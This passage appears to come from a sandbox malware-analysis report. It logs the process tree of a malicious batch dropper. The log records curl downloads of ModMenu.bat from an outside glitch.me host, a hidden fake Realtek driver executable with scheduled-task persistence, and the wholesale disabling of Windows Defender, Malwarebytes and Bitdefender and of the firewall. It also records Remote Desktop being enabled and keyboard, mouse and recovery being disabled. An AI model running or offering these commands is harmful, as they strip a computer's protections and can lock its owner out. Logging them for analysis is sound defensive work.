    "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:3540
- - C:\Windows\System32\attrib.exe
    "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:4804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEFFD.tmp.bat""
    3⤵
    PID:6620
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:6840
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
      4⤵
      Executes dropped EXE
      PID:6696
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
        5⤵
        
        PID:7476
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /Create /SC ONCE /TN "$77RealtekAudioDriverHost.exe" /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe \"\$77RealtekAudioDriverHost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7424
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
        5⤵
        
        PID:7832
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4176
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "RealtekAudioDriverHost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Launch.bat" "
  2⤵
  - Drops startup file
  - Suspicious use of WriteProcessMemory
  PID:3584
- - C:\Windows\system32\curl.exe
    curl -o ModMenu.bat https://sky-aerial-derby.glitch.me/ModMenu.bat
    3⤵
    PID:2432
- - C:\Windows\system32\curl.exe
    curl -o hig.bat https://sky-aerial-derby.glitch.me/ModMenu.bat
    3⤵
    PID:4168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat"
    3⤵
    - Drops file in Drivers directory
    - Drops file in System32 directory
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of WriteProcessMemory
    PID:4792
  - - C:\Windows\system32\openfiles.exe
      openfiles
      4⤵
      PID:4332
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(new-object -com shell.application).minimizeall()"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:2400
  - - C:\Windows\system32\curl.exe
      curl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png
      4⤵
      PID:5064
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3108
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f
      4⤵
      PID:5084
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f
      4⤵
      PID:5868
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      PID:1084
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f
      4⤵
      PID:6096
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f
      4⤵
      PID:2692
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      PID:2184
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f
      4⤵
      PID:3656
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:5400
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f
      4⤵
      PID:5152
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f
      4⤵
      PID:3040
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5220
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:5360
  - - C:\Windows\system32\sc.exe
      sc config WinDefend start=disabled
      4⤵
      PID:6020
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      PID:6108
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:1536
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:6104
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      PID:3636
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:2144
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f
      4⤵
      Modifies security service
      PID:2544
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f
      4⤵
      PID:1792
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f
      4⤵
      PID:5752
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f
      4⤵
      Modifies security service
      PID:1520
  - - C:\Windows\system32\cmd.exe
      cmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"
      4⤵
      PID:5412
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
        5⤵
        
        PID:592
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1416
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im explorer.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3488
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5516
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
      4⤵
      PID:5772
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f
      4⤵
      PID:404
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
      4⤵
      PID:5556
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f
      4⤵
      PID:5508
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
      4⤵
      PID:3684
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f
      4⤵
      PID:3424
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f
      4⤵
      PID:4480
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:3160
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f
      4⤵
      PID:712
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f
      4⤵
      PID:4488
  - - C:\Windows\system32\ReAgentc.exe
      reagentc /disable
      4⤵
      Drops file in Windows directory
      PID:2272
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3772
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2020
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Recovery /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4196
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4816
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {current} recoveryenabled No
      4⤵
      Modifies boot configuration data using bcdedit
      PID:5804
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /deletevalue {default} recoveryenabled
      4⤵
      Modifies boot configuration data using bcdedit
      PID:484
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f
      4⤵
      PID:896
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      PID:3040
  - - C:\Windows\system32\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:1032
  - - C:\Windows\system32\net.exe
      net stop "SDRSVC"
      4⤵
      PID:5220
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SDRSVC"
        5⤵
        
        PID:2320
  - - C:\Windows\system32\net.exe
      net stop "WinDefend"
      4⤵
      PID:5376
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WinDefend"
        5⤵
        
        PID:4036
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im "MSASCui.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5408
  - - C:\Windows\system32\net.exe
      net stop "security center"
      4⤵
      PID:1136
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "security center"
        5⤵
        
        PID:1536
  - - C:\Windows\system32\netsh.exe
      netsh firewall set opmode mode-disable
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:5768
  - - C:\Windows\system32\net.exe
      net stop "wuauserv"
      4⤵
      PID:5356
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "wuauserv"
        5⤵
        
        PID:5384
  - - C:\Windows\system32\net.exe
      net stop "Windows Defender Service"
      4⤵
      PID:4108
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Windows Defender Service"
        5⤵
        
        PID:3488
  - - C:\Windows\system32\net.exe
      net stop "Windows Firewall"
      4⤵
      PID:3652
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Windows Firewall"
        5⤵
        
        PID:3688
  - - C:\Windows\system32\net.exe
      net stop sharedaccess
      4⤵
      PID:5924
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop sharedaccess
        5⤵
        
        PID:4344
  - - C:\Windows\system32\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:2008
  - - C:\Windows\system32\reg.exe
      REG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:4172
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:3824
  - - C:\Windows\system32\sc.exe
      sc config WinDefend start= disabled
      4⤵
      Launches sc.exe
      PID:3736
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableAntiTamper $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4360
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4560
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:916
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\wscsvc.dll" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4300
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbam.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3908
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MBAMService.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3644
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbamtray.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:700
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbamscheduler.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5116
  - - C:\Windows\system32\sc.exe
      sc stop MBAMService
      4⤵
      Launches sc.exe
      PID:3656
  - - C:\Windows\system32\sc.exe
      sc delete MBAMService
      4⤵
      Launches sc.exe
      PID:3004
  - - C:\Windows\system32\sc.exe
      sc stop MBAMProtector
      4⤵
      Launches sc.exe
      PID:2784
  - - C:\Windows\system32\sc.exe
      sc delete MBAMProtector
      4⤵
      Launches sc.exe
      PID:3844
  - - C:\Windows\system32\sc.exe
      sc stop MBAMChameleon
      4⤵
      Launches sc.exe
      PID:5068
  - - C:\Windows\system32\sc.exe
      sc delete MBAMChameleon
      4⤵
      Launches sc.exe
      PID:5748
  - - C:\Windows\system32\sc.exe
      sc stop MBAMFarflt
      4⤵
      Launches sc.exe
      PID:2264
  - - C:\Windows\system32\sc.exe
      sc delete MBAMFarflt
      4⤵
      Launches sc.exe
      PID:3572
  - - C:\Windows\system32\sc.exe
      sc stop MBAMSwissArmy
      4⤵
      PID:2936
  - - C:\Windows\system32\sc.exe
      sc delete MBAMSwissArmy
      4⤵
      Launches sc.exe
      PID:3192
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f
      4⤵
      PID:1352
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f
      4⤵
      PID:896
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f
      4⤵
      PID:6072
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f
      4⤵
      PID:5716
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f
      4⤵
      PID:2320
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f
      4⤵
      PID:5480
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdservicehost.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4644
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdagent.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2836
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdredline.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2144
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdparentalservice.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1236
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdreinit.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:300
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdsubwiz.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3652
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM seccenter.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2444
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM vsserv.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4708
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM epssecurityservice.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:6004
  - - C:\Windows\system32\sc.exe
      sc stop bdservicehost
      4⤵
      Launches sc.exe
      PID:3736
  - - C:\Windows\system32\sc.exe
      sc delete bdservicehost
      4⤵
      Launches sc.exe
      PID:1144
  - - C:\Windows\system32\sc.exe
      sc stop bdagent
      4⤵
      Launches sc.exe
      PID:3712
  - - C:\Windows\system32\sc.exe
      sc delete bdagent
      4⤵
      Launches sc.exe
      PID:2916
  - - C:\Windows\system32\sc.exe
      sc stop bdredline
      4⤵
      Launches sc.exe
      PID:1580
  - - C:\Windows\system32\sc.exe
      sc delete bdredline
      4⤵
      Launches sc.exe
      PID:2688
  - - C:\Windows\system32\sc.exe
      sc stop bdparentalservice
      4⤵
      Launches sc.exe
      PID:3984
  - - C:\Windows\system32\sc.exe
      sc delete bdparentalservice
      4⤵
      Launches sc.exe
      PID:3888
  - - C:\Windows\system32\sc.exe
      sc stop bdreinit
      4⤵
      Launches sc.exe
      PID:3532
  - - C:\Windows\system32\sc.exe
      sc delete bdreinit
      4⤵
      Launches sc.exe
      PID:4676
  - - C:\Windows\system32\sc.exe
      sc stop bdsubwiz
      4⤵
      Launches sc.exe
      PID:4624
  - - C:\Windows\system32\sc.exe
      sc delete bdsubwiz
      4⤵
      Launches sc.exe
      PID:1140
  - - C:\Windows\system32\sc.exe
      sc stop seccenter
      4⤵
      Launches sc.exe
      PID:5160
  - - C:\Windows\system32\sc.exe
      sc delete seccenter
      4⤵
      Launches sc.exe
      PID:5952
  - - C:\Windows\system32\sc.exe
      sc stop vsserv
      4⤵
      Launches sc.exe
      PID:5736
  - - C:\Windows\system32\sc.exe
      sc delete vsserv
      4⤵
      PID:404
  - - C:\Windows\system32\sc.exe
      sc stop epssecurityservice
      4⤵
      Launches sc.exe
      PID:3920
  - - C:\Windows\system32\sc.exe
      sc delete epssecurityservice
      4⤵
      Launches sc.exe
      PID:5096
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f
      4⤵
      PID:3472
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f
      4⤵
      PID:1856
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f
      4⤵
      PID:5372
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f
      4⤵
      PID:5556
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f
      4⤵
      PID:4584
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f
      4⤵
      PID:5936
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f
      4⤵
      PID:2376
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f
      4⤵
      PID:5036
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f
      4⤵
      PID:2168
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f
      4⤵
      PID:4596
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f
      4⤵
      PID:6032
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:4860
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      4⤵
      PID:4532
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f
      4⤵
      PID:6120
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f
      4⤵
      PID:2316
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f
      4⤵
      PID:5696
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      PID:8
  - - C:\Windows\system32\sc.exe
      sc delete WinDefend
      4⤵
      Launches sc.exe
      PID:5100
  - - C:\Windows\system32\sc.exe
      sc stop SecurityHealthService
      4⤵
      Launches sc.exe
      PID:6000
  - - C:\Windows\system32\sc.exe
      sc delete SecurityHealthService
      4⤵
      Launches sc.exe
      PID:5028
  - - C:\Windows\system32\sc.exe
      sc stop Sense
      4⤵
      Launches sc.exe
      PID:3260
  - - C:\Windows\system32\sc.exe
      sc delete Sense
      4⤵
      Launches sc.exe
      PID:4896
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MsMpEng.exe /T
      4⤵
      Kills process with taskkill
      PID:6088
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MpCmdRun.exe /T
      4⤵
      Kills process with taskkill
      PID:3908
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM SecurityHealthSystray.exe /T
      4⤵
      Kills process with taskkill
      PID:5084
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM smartscreen.exe /T
      4⤵
      Kills process with taskkill
      PID:3096
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1836
  - - C:\Windows\system32\icacls.exe
      icacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5188
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Program Files\Windows Defender" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5400
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4816
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
      4⤵
      PID:5748
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f
      4⤵
      PID:5152
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
      4⤵
      PID:2464
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f
      4⤵
      PID:4796
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\notepad.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3068
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1352
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\calc.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5776
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5480
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4060
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2276
  - - C:\Windows\system32\powercfg.exe
      powercfg /hibernate off REM Disables hibernation
      4⤵
      Power Settings
      PID:4540
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in
      4⤵
      Power Settings
      PID:3524
